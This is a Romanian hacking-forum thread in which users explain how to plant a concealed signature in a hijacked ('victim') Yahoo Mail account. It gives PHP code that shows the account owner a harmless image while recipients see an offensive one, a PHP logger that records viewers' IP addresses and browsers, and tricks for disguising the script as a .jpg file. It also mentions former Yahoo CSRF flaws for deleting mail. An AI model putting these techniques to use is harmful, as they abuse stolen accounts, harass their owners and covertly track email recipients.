Victima yahoo: Semnatura ascunsa in yahoo mail

[loki]

Mi-a venit ideea gandindu-ma la cine stiu eu ca schimba semnaturile din conturile de yahoo sparte .

Ce-ar fi daca victima nu ar vedea aspectul semnaturii atunci cand scrie mail? SHOCK

Rezolvare: ATENTIE - testat numai pe yahoo clasic

Vom folosi 2 fotografii. Una care sa apara atunci cand compune un email, a doua atunci cand il citeste. Si un script php care le va incarca.

Sa zicem ca pozele se cheama cool.jpg si fuckyou.jpg. Cand victima va scrie un email va trebui sa ii apara poza cu cool.jpg. Sau sa nu-i apara absolut nimic, in acest caz google search dupa pixel.gif si salvati una de marime 1x1 pixeli (e folosita des la situri).

Pasul 1: codul php

<?
if($_SERVER['HTTP_REFERER']) echo file_get_contents("fuck_you.jpg");
else echo file_get_contents("cool.jpg");
?>

Uploadati undeva http://example.com/pic.php

Pasul 2: crearea semnaturii

Dati pe options->mail options->signature si selectati Rich Text Format

Cel mai simplu mod de a introduce poza este urmatorul:

creati in notepad un fisier test.htm si scrieti <img src="http://example.com/pic.php"> Deschideti fisierul test.htm in browser si dati CTRL+A CTRL+C (select all+copy) apoi in campul de la semnatura yahoo CTRL+V (paste). Salvati semnatura.

Motivul functionarii: cand dati reply la mesaj sau compose serverul nu primeste nimic in HTTP_REFERER. Dar cand cititi un mesaj cu acel php inclus HTTP_REFERER va fi setat pe link-ul din addressbar.

Faza frumoasa este ca puteti oricand inlocui fotografiile schimband astfel semnatura amaratului fara macar sa-i atingeti contul. Deasemenea puteti adauga in php un cod pentru a loga fiecare vizualizare a pozei (creati un folder loguri in prealabil):

<?php
$shortlog="./loguri/".date("Y-m-d").".csv";
if (!file_exists($log)) file_put_contents($log, "Time:, REMOTE_ADDR, HTTP_USER_AGENT, HTTP_REFERER\r\n");
$fh=fopen($log, 'a'); fwrite($fh, date("Y/m/d h:i:s").", ".$_SERVER['REMOTE_ADDR'].", ".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].", ".$HTTP_USER_AGENT.", ".$HTTP_REFERER."\r\n");
fclose($fh);
?>

Rezultat: cum arata un mesaj in compose si la final.

Edited February 5, 2010 by loki
ups

[CrYsTy4N]

Da-mi si mie poza cu baba aia

[Guest Nemessis]

Daca folosesti .php in continutul mesajului va trimite numai in bulk datorita filtrelor. E mai simplu sa pui link catre o imagine reala hostata pe serverul tau pe care sa o schimbi cum vrei. Parerea mea

[loki]

e mailul victimei, nu ma doare capul unde i se duc mesajele.

De la mine catre mine s-a dus in inbox. Dar mersi de idee o sa mai testez. Totusi e putin probabil sa stii pentru ca uite, si readnotify si multe servicii facute sa urmareasca mailul se folosesc de metode similare, cu php-uri bagate in poze. Si eu logam mailurile asa.

Mai e o metoda: faci un folder numit poza.jpg iar in folder pui un index.php

link-ul catre poza va fi http://www.example.com/poza.jpg/

@CrYsTy4N:

Edited February 5, 2010 by loki

[Guest Nemessis]

Faza cu folderul e folosita pentru ca convinge o persoana sa dea click pe un url dar nu iti va afisa nici o poza la embed. Am incercat in urma cu cateva zile sa pun in acelasi loc si folder cu poza.jpg si poza.jpg ca imagine dar nu prea mi-a reusit mare lucru. Pe local la teste am putut sa fac ceva functional de genul

<a href = http://site.com/poza.jpg alt+255 /><img src = http://site.com/poza.jpg ></a>

insa in clipa in care urcam fisierele pe domeniu spatiul de la <a href = http://site.com/poza.jpg alt+255 /> era interpretat ca si caracter si nu functiona linkul.

[Guest Nemessis]

Completare: <a href = http://site.com/poza.jpg alt+255 /> fiind folder.

[loki]

nu nu nu

normal ca nu poti pune in acelasi loc un folder si o poza cu acelasi nume.

dar ziceam de altceva:

pune un index.php intr-un folder asa: pic.jpg/index.php

<img src="pic.jpg/index.php"> face acelasi lucru cu <img src="pic.jpg"> Fisierul index ti-l ia browserul implicit din folderul numit pic.jpg

[Guest Nemessis]

Dar se vede url-ul ce include /index.php in status bar daca pui mouse deasupra, ceea ce sucks. Sunt sigur ca se poate face ceva pentru a pune doua fisiere cu acelasi nume in acelasi loc. Pana la urma e vorba de un folder si o imagine, doua chestii total diferite. Probabil un tweak al serverului poate face posibil acest lucru.

[RIP]

cred ca loki se referea la faptul ca daca pui <img src="pic.jpg">, iar pic.jpg este numele unui director

serveru iti i-a automat fishierul index.* din directorul respectiv

ceva de genu la fel cand chemi adresa RST - citeste defapt index.php fara sa-ti afisheze lista de fishiere din director, totodata nu tie afishat in bara de url...

posibil sa mearga faza si la imagini... n-am testat

[Guest Nemessis]

Nu merge la imagini.

[loki]

Nu merge la imagini.

man mie imi merge perfect

<img src="http://eu.servepics.com/pic.jpg">

nu iti scrie nik in status bar ca doar e poza.

doar atat ca in mozilla daca dau servepics.com imi apare ca text. Treaba e ca m-am grabit cu echo dar poti inlocui echo $s cu header() spre un jpg si merge best (am uitat initial de functia asta).

Da, foloseam cum a zis RIP. Solutii sunt. Ia uita-te la pozele de pe Danasoft IP and City Sign Widget - For Myspace Layouts and Backgrounds, Forum Signatures, Blogs si gandeste-te cum sunt facute si ce misto pot fi folosite.

Acum depinde ce vrei sa faci. Nu poti executa decat cod php spre a culege niste informatii (IP, etc), nu merge javascript sau altceva. Inainte mergeau niste csrf-uri superbe la yahoo prin care puteai sterge mailul proaspat primit (folosind m.yahoo) sau dezactiva spam protection-ul.

Edited February 5, 2010 by loki

[Guest Nemessis]

loki ii raspundeam lui RIP referitor la posibilitatea de a executa directorul in <img src=bla bla bla>

[MadAgent]

Nu am incercat, dar teoretic ar trebui sa mearga sa faci cu php si .htaccess o smecherie. gen pentru poza.jpg sa-mi arate poza.php si poza.php sa includa dupa verificare poza.jpg de pe undeva...